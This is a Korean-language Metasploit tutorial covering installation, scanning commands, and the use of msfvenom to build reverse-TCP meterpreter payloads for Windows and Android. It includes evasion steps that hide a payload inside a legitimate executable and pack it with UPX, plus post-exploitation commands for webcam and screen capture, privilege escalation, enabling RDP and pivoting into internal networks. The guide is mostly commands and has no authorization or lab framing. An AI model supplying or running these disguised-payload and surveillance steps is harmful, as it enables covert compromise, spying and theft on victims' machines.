Metasploit 개요

Metasploit는 오픈소스 침투 테스트 프레임워크로, 수천 개의 공개된 취약점 모듈과 테스트 도구를 포함합니다. Ruby 언어로 개발된 모듈은 사용자 정의 수정이 가능하며, 선택한 공격 모듈에 대한 매개변수 설정만으로 취약점 테스트 및 활용을 자동화합니다.

플랫폼별 설치 방법

Windows 환경

공식 사이트에서 설치 프로그램 다운로드 후 관리자 권한으로 실행합니다. 설치 시 PostgreSQL 데이터베이스가 함께 구성되며, 데스크톱 바로 가기 생성 후 관리자 권한으로 실행합니다. 웹 인터페이스도 제공됩니다.

Linux 환경

git clone https://github.com/rapid7/metasploit-framework.git
cd metasploit-framework
chmod +x msfconsole && ./msfconsole

또는 통합 설치 스크립트 실행:

curl -LO https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb
chmod +x msfupdate.erb && ./msfupdate.erb

Android 환경

루팅된 기기에서 Termux 설치 후 패키지 업데이트:

pkg update && pkg upgrade -y

Linux 설치 절차 동일하게 진행

기본 명령어 활용

db_status              # 데이터베이스 연결 상태 확인
db_nmap                # Nmap 스캔 실행 및 결과 저장
search ssh             # SSH 관련 모듈 검색
use auxiliary/scanner/ssh/ssh_login  # 모듈 선택
show options           # 필수 매개변수 확인
set RHOSTS 192.168.1.0/24  # 대상 네트워크 설정
run                    # 모듈 실행

악성 페이로드 생성

역방향 연결 페이로드 생성 예시:

msfvenom -p windows/meterpreter_reverse_tcp \
LHOST=서버_IP LPORT=5555 \
-f exe > payload.exe

Android용 페이로드:

msfvenom -p android/meterpreter_reverse_tcp \
LHOST=서버_IP LPORT=5555 -o android_payload.apk

탐지 회피 기법

실행 파일 위장:

msfvenom -p windows/meterpreter_reverse_tcp LHOST=서버_IP \
-x legitimate.exe -k -f exe -o disguised.exe

UPX 패킹 적용:

upx --best disguised.exe -o packed.exe

Meterpreter 활용

sysinfo                 # 시스템 정보 확인
screenshot              # 화면 캡처
webcam_snap             # 웹캠 사진 촬영
getsystem               # SYSTEM 권한 상승
run post/windows/manage/enable_rdp  # 원격 데스크톱 활성화
portfwd add -L 8080 -r 내부_IP -p 3389  # 포트 포워딩

내부 네트워크 대상 작업

세션 기반 라우팅 설정:

run autoroute -s 10.0.0.0/24
run autoroute -p        # 라우팅 테이블 확인

내부 네트워크 스캔:

use auxiliary/scanner/portscan/tcp
set RHOSTS 10.0.0.0/24
run